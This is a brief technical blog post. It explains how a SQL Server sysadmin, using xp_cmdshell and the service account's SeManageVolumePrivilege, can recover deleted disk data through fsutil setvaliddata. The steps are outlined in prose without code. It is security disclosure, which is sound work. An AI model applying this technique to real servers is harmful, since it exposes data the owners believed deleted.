Various technical articles, IT-related tutorials, software information, and development journals
Monday, January 1, 2018
SQL Server sysadmins can affect the host machine
Microsoft SQL Server has an xp_cmdshell procedure that runs the a given program with arguments. It's unavailable by default, but can be enabled by server sysadmins. The account under which SQL Server runs is roughly equivalent to a standard user, but it has a couple extra privileges enabled. Most relevantly, it has SeManageVolumePrivilege, which permits the use of SetFileValidData (which is how the fsutil file setvaliddata command works). Therefore, if an attacker can gain sysadmin privileges on an SQL Server, they can exfiltrate deleted data from the disk like so: create a blank file, write a zero byte at a large address in that file, set the valid data to that point, and read the file's contents. PowerShell makes the first and last steps pretty easy.
Labels:
security
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment